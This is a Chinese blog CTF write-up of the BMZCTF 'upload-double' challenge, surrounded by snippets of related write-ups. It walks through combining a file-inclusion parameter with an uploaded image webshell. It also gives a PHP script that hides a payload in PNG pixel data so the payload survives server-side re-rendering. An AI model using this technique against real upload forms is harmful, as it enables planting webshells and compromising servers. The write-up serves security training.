BMZCTF:upload-double

于 2021-04-30 13:26:42 发布 357 收藏 1
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/116301241
版权 
http://www.bmzclub.cn/challenges#upload-double

在这里插入图片描述
在这里插入图片描述

/inc.php?inc=upload.php疑似存在文件包含,文件上传后缀被控制的无法绕过,上传图片马然后,尝试包含图片马
在这里插入图片描述
成功包含了,但是好像执行并没有效果
在这里插入图片描述
下载上传到服务器上的图片,发现木马的内容不见了,判断这里应该是对上传的图片进行了二次渲染,木马内容被渲染后去除了
在这里插入图片描述
要使图片马有效,就得将木马内容写在不会被二次渲染的区域,搜索引擎找到个脚本可以将木马内容放在不会被渲染的区域,并且能够成功上传

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}
 
imagepng($img,'./reander.png');
?>

在这里插入图片描述
在这里插入图片描述
成功包含木马内容
在这里插入图片描述

末初mochu7
关注
  • 1
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
laravel-chunk-upload-example:laravel-chunk-upload的示例项目
05-02
git clone git@github.com:pionl/laravel-chunk-upload-example.git --recurse-submodules --remote-submodules npm install --only=production 用法 安装特定的Laravel版本。 使用X. *版本格式。 node setup.js "8...
BMZCTF WEB upload-double
qq_26243045的博客
01-13 351
打开页面,是一个上传页面,我们需要上传木马来获取flag 先后尝试了改后缀,00截断等方法均上传不了。而且还有白名单过滤。于是想到了二次渲染。 首先寻找文件包含的页面。观察上传页面的url: http://www.bmzclub.cn:20320/inc.php?inc=upload.php 'inc'为传参变量。会包含upload.php。 尝试上传一张正常图片。 会看到下面能显示出来我们刚才上传的图片,右键查看源代码: 会得到图片的地址。我们尝试用'inc'来包含这个图片。
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习
break_cat的博客
11-17 1430
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习 背景:上周末参加了BMZCTF的渗透测试公开赛,比赛是解BMZCTF靶场中综合渗透的一道题,比赛后官方发了WP,跟着做了一遍,出现了一些问题,写出来抛砖引玉,求指导。 思路:1.官方预期解法(这……我做出来的和解法效果不一样,求大佬指点)            2.非预期解法——广州航海学院 HhhM(成功,感谢HhhM大佬的思路,学习了) &nb
BMZCTF file-vault详解 php反序列化利用姿势
u013797594的博客
07-14 243
BMZCTF file-vault详解 php反序列化利用姿势 题目: 打开题目是一个上传页面。 拿到题目第一步要做的就是信息收集,使用dirsearch扫描一下敏感信息,发现存在一个index.php~文件,这是vim编辑器自动生成的备份文件,打开就是这道题的源码了 <?php error_reporting(0); include('secret.php'); $sandbox_dir = 'sandbox/'.sha1($_SERVER['REMOTE_ADDR']); global $
CTF练习题——Upload上传的一道解题思路
Jum的博客
08-11 1845
好久没有去联系联系了,今天做了一道关于Upload的题,分享一下 目录 拿题目 找思路 得到结果 成功 拿题目 这道题目是百度CTF题目,题干如下: 找思路 题干中提示 tips:flag在flag.php中。看到题干后,可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代码来打开flag.php页面: <?php $fh=fopen('../flag.php','r'); echo fread($fh,filesize("../flag.php")); ...
[BMZCTF]-CISCN_2019_WEB_1
cjdgg的博客
05-25 135
[BMZCTF]-CISCN_2019_WEB_1 這道題目先注册一个用户登录进来吧 登陆后只有一个文件上传功能,而且限制了只能上传png,jpg,gif文件,其他的一律不允许,文件上传的一些绕过经过初步尝试是无效的,而且上传之后文件的存储路径不知道 这里可以注意道,他这里还提供了个文件下载的功能,那就说不定可以下载任意文件,这里直接抓下载的包然后尝试一下下载,成功拿到源代码 最终一共找到这么几个页面的源代码 看到了好几个魔法方法,果断全局搜索serialize 有点可惜 但还有phar,phar
webpack-upload-plugin:Webpack插件
05-13
webpack-upload-plugin介绍这是的插件。 主要目的是提供一个工具,用于将html(或其他语言的模板)中使用的js / css / img / font上传到cdn,然后将引用替换为相应的cdn url。环境要求节点> = 10.5.0安装npm i -D ...
aliyun-sdk-vod-upload-1.4.13.jar 编译好的压缩包 直接解压到maven下即可
06-05
aliyun-sdk-vod-upload-1.4.13.jar 编译好的压缩包 直接解压到maven下即可
aliyun-java-vod-upload-1.4.11.jar
07-16
阿里云视频点播pom依赖,
laravel-woaap-upload:laravel-waaap-upload
03-17
包裹安装composer require " james.xue/laravel-woaap-upload "执照麻省理工学院
BMZCTF sqli_double
qq_26243045的博客
11-29 317
考点:代码审计、sql注入 打开页面即可看到源码: 有两个页面,一个是修改密码的(需要知道用户名和邮箱),一个是登录页面。 因为我们不知道用户名和邮箱,先试试登录页面: 回显提示"登录失败",我们不知是密码还是用户名错了,尝试使用sqlmap进行爆破: 可以看到已经试出了数据库类型为mysql 爆库: 爆表: 爆内容: 现在我们知道了用户名和邮箱,就可以修改密码了。修改密码后登录,即可看到flag: ...
图片二次渲染的绕过
soldi_er的博客
06-04 1569
文章目录二次渲染1.二次渲染函数labs-16_GIF二次渲染cicsn2021-upload2.png渲染绕过参考 二次渲染 1.二次渲染函数 labs-16_GIF二次渲染   (1)imagecreatefromgif($filename):resource,由Gif文件或 URL 创建一个新图象。 成功则返回一图像标识符/图像资源,失败则返回false。(PHP 4, PHP 5, PHP 7, PHP 8)   重点:该函数会对图像进行二次渲染,从而导致图片马的数据丢失,上传图片马失败。   (
FileUpload获取上传文件的大小,将其转换为double类型出现了问题
yingjing8122的博客
01-02 444
double i = FileUpload1.PostedFile.ContentLength/(1024*1024); string size = Convert.ToString(i) + "M"; 为什么i的值是0.0??? double i = double.Parse(( FileUpload1.PostedFile.ContentLength/(1024*1024)).ToStr
“百度杯”CTF比赛 九月场 Upload解题思路
qq_43473164的博客
05-16 1461
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度杯CTF比赛的Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
BMZCTF Web up
qq_26243045的博客
01-14 237
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。
lambda-upload-to-vimeo:Lambda-func 将视频上传到 vimeo
06-12
lambda 上传到 vimeo Lambda-func 将视频上传到 vimeo用法像调用任何 lambda 函数一样调用此函数,如 aws sdk 中所述。 或通过亚马逊的界面在功能的“编辑”选项卡上或通过 AWS CLI有效载荷必需的sourceBucket - 要...
ZEND---jQuery-File-Upload:ZEND---jQuery-文件-上传
06-26
ZEND---jQuery-文件-上传 我创建这个代码文件是因为大多数人在我的博客上询问如何正确地将此插件集成到像 CakePHP 或 Zend 这样的 MCV 框架中等等。 所以我分享了一些代码来寻求帮助。
ngx-upload:Ngx-upload是为Angular Ivy准备的上传模块
05-17
Ngx上传演示版目录关于Ngx-upload是Angular框架的模块。 Ngx-upload支持拖放,上传进度并为您管理文件上传队列。 Ngx-upload绑定到任何表示框架,但是您可以将其与ng(x)-bootstrap或Angular Material Design一起...
包含upload-module的nginx-1.21.6的windows平台64位的二进制文件
02-05
包含upload-module的nginx-1.21.6,针对windows平台64位的编译的二进制(exe)文件。 为了upload-module能在window平台编译通过,进行部分代码修改,修改内容详见https://github.com/chnykn/bimface
cannot resolve com.aliyun:aliyun-sdk-vod-upload:1.4.11
最新发布
03-16
这个错误信息提示无法解析com.aliyun:aliyun-sdk-vod-upload:1.4.11,可能是由于以下原因之一导致的: 1. 你的项目中没有添加Aliyun SDK VOD Upload库的依赖,需要在项目的构建文件中添加依赖项。 2. 版本号1.4.11可能已经过时,你可以尝试更新到最新版本。 3. 你的网络连接可能存在问题,无法从Maven仓库中下载该库。你可以检查你的网络连接是否正常。 如果你确定已经添加了依赖项并检查了网络连接,但仍然无法解决该问题,你可以尝试清除项目并重新构建。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值